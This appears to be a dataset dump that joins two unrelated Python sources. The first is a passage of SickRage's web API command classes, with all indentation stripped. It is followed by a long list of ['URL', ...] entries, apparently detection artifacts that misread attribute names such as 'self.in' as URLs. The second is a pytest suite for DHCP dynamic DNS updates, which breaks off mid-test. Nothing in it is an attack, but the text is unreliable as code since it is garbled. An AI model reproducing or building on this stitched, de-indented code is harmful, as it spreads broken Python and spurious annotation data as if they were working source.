# return {"poster": 0, "banner": 0}
cache_obj = image_cache.ImageCache()
has_poster = 0
has_banner = 0
if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)):
has_poster = 1
if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)):
has_banner = 1
return _responds(RESULT_SUCCESS, {"poster": has_poster, "banner": has_banner})
class CMD_ShowDelete(ApiCall):
_help = {
"desc": "Delete a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"removefiles": {
"desc": "True to delete the files associated with the show, False otherwise. This can not be undone!"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.removefiles, args = self.check_params(args, kwargs, "removefiles", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a show in SickRage """
error, show = Show.delete(self.indexerid, self.removefiles)
if error:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name)
class CMD_ShowGetQuality(ApiCall):
_help = {
"desc": "Get the quality setting of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the quality setting of a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
any_qualities, best_qualities = _map_quality(show_obj.quality)
return _responds(RESULT_SUCCESS, {"initial": any_qualities, "archive": best_qualities})
class CMD_ShowGetPoster(ApiCall):
_help = {
"desc": "Get the poster of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the poster a show """
return {
'outputType': 'image',
'image': ShowPoster(self.indexerid),
}
class CMD_ShowGetBanner(ApiCall):
_help = {
"desc": "Get the banner of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the banner of a show """
return {
'outputType': 'image',
'image': ShowBanner(self.indexerid),
}
class CMD_ShowGetNetworkLogo(ApiCall):
_help = {
"desc": "Get the network logo of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
"""
:return: Get the network logo of a show
"""
return {
'outputType': 'image',
'image': ShowNetworkLogo(self.indexerid),
}
class CMD_ShowGetFanArt(ApiCall):
_help = {
"desc": "Get the fan art of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the fan art of a show """
return {
'outputType': 'image',
'image': ShowFanArt(self.indexerid),
}
class CMD_ShowPause(ApiCall):
_help = {
"desc": "Pause or un-pause a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"pause": {"desc": "True to pause the show, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or un-pause a show """
error, show = Show.pause(self.indexerid, self.pause)
if error:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, ('resumed', 'paused')[show.paused]))
class CMD_ShowRefresh(ApiCall):
_help = {
"desc": "Refresh a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Refresh a show in SickRage """
error, show = Show.refresh(self.indexerid)
if error:
return _responds(RESULT_FAILURE, msg=error)
        return _responds(RESULT_SUCCESS, msg='%s has been queued to be refreshed' % show.name)
class CMD_ShowSeasonList(ApiCall):
_help = {
"desc": "Get the list of seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"sort": {"desc": "Return the seasons in ascending or descending order"}
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "desc", False, "string", ["asc", "desc"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of seasons of a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
if self.sort == "asc":
sql_results = my_db.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC",
[self.indexerid])
else:
sql_results = my_db.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC",
[self.indexerid])
season_list = [] # a list with all season numbers
for row in sql_results:
season_list.append(int(row["season"]))
return _responds(RESULT_SUCCESS, season_list)
class CMD_ShowSeasons(ApiCall):
_help = {
"desc": "Get the list of episodes for one or all seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"season": {"desc": "The season number"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.season, args = self.check_params(args, kwargs, "season", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of episodes for one or all seasons of a show """
sho_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not sho_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
if self.season is None:
sql_results = my_db.select(
"SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?",
[self.indexerid])
seasons = {}
for row in sql_results:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_strings(status)
row["quality"] = get_quality_string(quality)
if helpers.tryInt(row['airdate'], 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
row['airdate'] = 'Never'
cur_season = int(row["season"])
cur_episode = int(row["episode"])
del row["season"]
del row["episode"]
if cur_season not in seasons:
seasons[cur_season] = {}
seasons[cur_season][cur_episode] = row
else:
sql_results = my_db.select(
"SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?",
[self.indexerid, self.season])
if len(sql_results) == 0:
return _responds(RESULT_FAILURE, msg="Season not found")
seasons = {}
for row in sql_results:
cur_episode = int(row["episode"])
del row["episode"]
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_strings(status)
row["quality"] = get_quality_string(quality)
if helpers.tryInt(row['airdate'], 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
row['airdate'] = 'Never'
                seasons[cur_episode] = row
return _responds(RESULT_SUCCESS, seasons)
class CMD_ShowSetQuality(ApiCall):
_help = {
"desc": "Set the quality setting of a show. If no quality is provided, the default user setting is used.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
        # the commented-out variant below dropped "hdbluray" rather than "sdtv"
        # from the allowed values, and _get_quality_map() was not used everywhere,
        # so the explicit lists are kept
        # self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list", _get_quality_map().values()[1:])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl",
"hdbluray", "fullhdbluray"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the quality setting of a show. If no quality is provided, the default user setting is used. """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
show_obj.quality = new_quality
return _responds(RESULT_SUCCESS,
msg=show_obj.name + " quality has been changed to " + get_quality_string(show_obj.quality))
class CMD_ShowStats(ApiCall):
_help = {
"desc": "Get episode statistics for a given show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get episode statistics for a given show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# show stats
episode_status_counts_total = {"total": 0}
for status in statusStrings:
if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:
continue
episode_status_counts_total[status] = 0
# add all the downloaded qualities
episode_qualities_counts_download = {"total": 0}
for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_download[statusCode] = 0
# add all snatched qualities
episode_qualities_counts_snatch = {"total": 0}
for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_snatch[statusCode] = 0
my_db = db.DBConnection(row_type="dict")
sql_results = my_db.select("SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?",
[self.indexerid])
# the main loop that goes through all episodes
for row in sql_results:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
episode_status_counts_total["total"] += 1
if status in Quality.DOWNLOADED + Quality.ARCHIVED:
episode_qualities_counts_download["total"] += 1
episode_qualities_counts_download[int(row["status"])] += 1
elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:
episode_qualities_counts_snatch["total"] += 1
episode_qualities_counts_snatch[int(row["status"])] += 1
elif status == 0: # we don't count NONE = 0 = N/A
pass
else:
episode_status_counts_total[status] += 1
# the outgoing container
episodes_stats = {"downloaded": {}}
# turning codes into strings
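        # e.g. a quality label such as "SD DVD" is normalized to the key "sd_dvd"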
for statusCode in episode_qualities_counts_download:
if statusCode == "total":
episodes_stats["downloaded"]["total"] = episode_qualities_counts_download[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
episodes_stats["downloaded"][status_string] = episode_qualities_counts_download[statusCode]
episodes_stats["snatched"] = {}
# turning codes into strings
# and combining proper and normal
for statusCode in episode_qualities_counts_snatch:
if statusCode == "total":
episodes_stats["snatched"]["total"] = episode_qualities_counts_snatch[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
            # the keys stored in episodes_stats["snatched"] are the normalized
            # status_string values, so compare against status_string (the raw
            # Quality.qualityStrings label would never match)
            if status_string in episodes_stats["snatched"]:
episodes_stats["snatched"][status_string] += episode_qualities_counts_snatch[statusCode]
else:
episodes_stats["snatched"][status_string] = episode_qualities_counts_snatch[statusCode]
# episodes_stats["total"] = {}
for statusCode in episode_status_counts_total:
if statusCode == "total":
episodes_stats["total"] = episode_status_counts_total[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = statusStrings[statusCode].lower().replace(" ", "_").replace("(", "").replace(
")", "")
episodes_stats[status_string] = episode_status_counts_total[statusCode]
return _responds(RESULT_SUCCESS, episodes_stats)
class CMD_ShowUpdate(ApiCall):
_help = {
"desc": "Update a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Update a show in SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
try:
sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable
            return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + " has been queued to be updated")
except CantUpdateShowException as e:
logger.log(u"API::Unable to update show: {0}".format(str(e)), logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Unable to update " + str(show_obj.name))
class CMD_Shows(ApiCall):
_help = {
"desc": "Get all shows in SickRage",
"optionalParameters": {
"sort": {"desc": "The sorting strategy to apply to the list of shows"},
"paused": {"desc": "True to include paused shows, False otherwise"},
},
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "id", False, "string", ["id", "name"])
self.paused, args = self.check_params(args, kwargs, "paused", None, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all shows in SickRage """
shows = {}
for curShow in sickbeard.showList:
if not self.paused and curShow.paused: # If we're not including paused shows, and the current show is paused
continue # continue with the next show
indexer_show = helpers.mapIndexersToShow(curShow)
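            # the (0, 1)[flag] indexing below coerces boolean attributes to 0/1 for the JSON payload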
show_dict = {
"paused": (0, 1)[curShow.paused],
"quality": get_quality_string(curShow.quality),
"language": curShow.lang,
"air_by_date": (0, 1)[curShow.air_by_date],
"sports": (0, 1)[curShow.sports],
"anime": (0, 1)[curShow.anime],
"indexerid": curShow.indexerid,
"tvdbid": indexer_show[1],
"network": curShow.network,
"show_name": curShow.name,
"status": curShow.status,
"subtitles": (0, 1)[curShow.subtitles],
}
if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict['network']))
show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
show_dict['next_ep_airdate'] = ''
show_dict["cache"] = CMD_ShowCache((), {"indexerid": curShow.indexerid}).run()["data"]
if not show_dict["network"]:
show_dict["network"] = ""
if self.sort == "name":
shows[curShow.name] = show_dict
else:
shows[curShow.indexerid] = show_dict
return _responds(RESULT_SUCCESS, shows)
class CMD_ShowsStats(ApiCall):
_help = {"desc": "Get the global shows and episodes statistics"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the global shows and episodes statistics """
stats = Show.overall_stats()
return _responds(RESULT_SUCCESS, {
'ep_downloaded': stats['episodes']['downloaded'],
'ep_snatched': stats['episodes']['snatched'],
'ep_total': stats['episodes']['total'],
'shows_active': stats['shows']['active'],
'shows_total': stats['shows']['total'],
})
# WARNING: never define a cmd call string that contains a "_" (underscore)
# this is reserved for cmd indexes used while cmd chaining
# WARNING: never define a param name that contains a "." (dot)
# this is reserved for cmd namespaces used while cmd chaining
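# Illustrative example of chaining (hypothetical api key and indexer ids):
#   /api/APIKEY/?cmd=show_1|show_2&show_1.indexerid=101501&show_2.indexerid=79488
# "_1"/"_2" are the cmd indexes and "show_1."/"show_2." the per-cmd namespaces
# that the two reserved characters above are kept free for.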
function_mapper = {
"help": CMD_Help,
"future": CMD_ComingEpisodes,
"episode": CMD_Episode,
"episode.search": CMD_EpisodeSearch,
"episode.setstatus": CMD_EpisodeSetStatus,
"episode.subtitlesearch": CMD_SubtitleSearch,
"exceptions": CMD_Exceptions,
"history": CMD_History,
"history.clear": CMD_HistoryClear,
"history.trim": CMD_HistoryTrim,
"failed": CMD_Failed,
"backlog": CMD_Backlog,
"logs": CMD_Logs,
"sb": CMD_SickBeard,
"postprocess": CMD_PostProcess,
"sb.addrootdir": CMD_SickBeardAddRootDir,
"sb.checkversion": CMD_SickBeardCheckVersion,
"sb.checkscheduler": CMD_SickBeardCheckScheduler,
"sb.deleterootdir": CMD_SickBeardDeleteRootDir,
"sb.getdefaults": CMD_SickBeardGetDefaults,
"sb.getmessages": CMD_SickBeardGetMessages,
"sb.getrootdirs": CMD_SickBeardGetRootDirs,
"sb.pausebacklog": CMD_SickBeardPauseBacklog,
"sb.ping": CMD_SickBeardPing,
"sb.restart": CMD_SickBeardRestart,
"sb.searchindexers": CMD_SickBeardSearchIndexers,
"sb.searchtvdb": CMD_SickBeardSearchTVDB,
"sb.searchtvrage": CMD_SickBeardSearchTVRAGE,
"sb.setdefaults": CMD_SickBeardSetDefaults,
"sb.update": CMD_SickBeardUpdate,
"sb.shutdown": CMD_SickBeardShutdown,
"show": CMD_Show,
"show.addexisting": CMD_ShowAddExisting,
"show.addnew": CMD_ShowAddNew,
"show.cache": CMD_ShowCache,
"show.delete": CMD_ShowDelete,
"show.getquality": CMD_ShowGetQuality,
"show.getposter": CMD_ShowGetPoster,
"show.getbanner": CMD_ShowGetBanner,
"show.getnetworklogo": CMD_ShowGetNetworkLogo,
"show.getfanart": CMD_ShowGetFanArt,
"show.pause": CMD_ShowPause,
"show.refresh": CMD_ShowRefresh,
"show.seasonlist": CMD_ShowSeasonList,
"show.seasons": CMD_ShowSeasons,
"show.setquality": CMD_ShowSetQuality,
"show.stats": CMD_ShowStats,
"show.update": CMD_ShowUpdate,
"shows": CMD_Shows,
"shows.stats": CMD_ShowsStats
}
['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'Show.pa'], ['URL', 'self.in'], ['URL', 'self.pa'], ['URL', 'show.na'], ['URL', 'show.pa'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.re'], ['URL', 'self.in'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.so'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.se'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.NO'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'Quality.NO'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.showQueueScheduler.ac'], ['URL', 'obj.na'], ['URL', 'logger.DE'], ['URL', 'obj.na'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.sh'], ['URL', 'self.pa'], ['URL', 'curShow.pa'], ['URL', 'helpers.ma'], ['URL', 'curShow.pa'], ['URL', 'curShow.la'], ['URL', 'curShow.ai'], ['URL', 'curShow.an'], ['URL', 'curShow.in'], ['URL', 'curShow.net'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'curShow.su'], ['URL', 'helpers.tr'], ['URL', 'curShow.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'curShow.ne'], ['URL', 'curShow.ai'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'curShow.in'], ['URL', 'self.so'], ['URL', 'curShow.na'], ['URL', 'curShow.in'], ['URL', 'episode.se'], ['URL', 'episode.se'], ['URL', 'episode.su'], ['URL', 'history.cl'], ['URL', 'history.tr'], ['URL', 'sb.ad'], ['URL', 'sb.ch'], ['URL', 'sb.ch'], ['URL', 'sb.de'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.pa'], ['URL', 'sb.re'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], 
['URL', 'sb.se'], ['URL', 'sb.sh'], ['URL', 'show.ad'], ['URL', 'show.ad'], ['URL', 'show.ca'], ['URL', 'show.de'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.pa'], ['URL', 'show.re'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.st'], ['URL', 'shows.st']] |
12 | """DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_success_Sflag():
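    """Client sends the FQDN option with the S flag set; the server should add both the forward (A) and reverse (PTR) records."""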
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_fail_Sflag():
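    """Client requests an FQDN outside the configured zone ('aa.four.exae.com.'); the lease is granted but neither the A nor the PTR record is created."""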
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
